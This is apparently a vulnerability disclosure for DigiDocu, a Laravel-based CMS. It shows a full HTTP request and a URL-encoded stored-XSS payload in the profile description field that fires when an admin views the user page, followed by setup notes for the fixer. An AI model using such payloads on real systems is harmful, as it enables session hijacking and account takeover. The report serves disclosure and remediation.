✍️ Description

DigiDocu is a CMS written in PHP using Laravel Framework. Laravel uses Blade templating engine which sanitizes the HTML by default. But DigiDocu is trying to render some HTML content without validating the input that comes from the user's profile ie. users can write some HTML using the description field in their profiles. There is a WYSIWYG editor that helps users to write the HTML without writing HTML but then, it still sends HTML behind the scenes which can be easily manipulated.

🕵️‍♂️ Proof of Concept

As a low privileged user, login and go to /admin/profile

Submit the form while capturing the request in a proxy like burpsuite

Your request should look like:

POST /admin/profile HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
Origin: http://localhost:8000
DNT: 1
Connection: close
Referer: http://localhost:8000/admin/profile
Cookie: [REDACTED]
Upgrade-Insecure-Requests: 1

_token=Q4ETEwXTbRdzZZbpvFasb5xdGsIbj5UTRlkZCcKf&name=test&email=test%40test.test&username=test&address=&description=%3Cp%3Etest%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1&btnprofile=btnprofile

Replace the description parameter's value with %3cp%3etest%20%3cimg%20src%3d%22http%3a%2f%2fexample.com%22%20onerror%3d%22alert(1)%22%3e%3cbr%3e%3c%2fp%3e. Now send the request.

The payload now lives at http://localhost:8000/admin/users/2 where 2 is attacker's user id. As soon as the admin opens up the page, XSS alert will pop up.

💥 Impact

This vulnerability is capable of stored XSS. This can be utilized to escalate privileges, account takeover and chain with other bugs that can lead to Remote code execution.

For the Fixer

Before you start installing this package, note that this package requires PHP 7.2 which has reached EOL. So the default PHP version might not be 7.2 in your distribution's package manager. So check your PHP's version before continuing.

If you don't have PHP 7.2, Either install PHP 7.2 or bump the PHP version in composer.json to your installed PHP version.

But be cautious with bumping as newer version might not have some functions which might being used within this package. So it is recommended to install PHP instead of tinkering with composer.json. If you have PHP 7.3, its fine to edit composer.json and update the required version to 7.3. If you have updated composer.json, run composer update to reinstall the latest version.

Whichever PHP version you use, make sure to run all the composer commands from that PHP version ie. if you have PHP 8 but you also installed PHP 7.2, very likely your php executable points to the 8th version. So instead of running composer commands directly, you should run composer as

php72 $(which composer) --version

This way composer will see PHP 7.2 and not version 8.

Now you can continue to install this package using these instructions: https://github.com/harish81/digidocu#installation.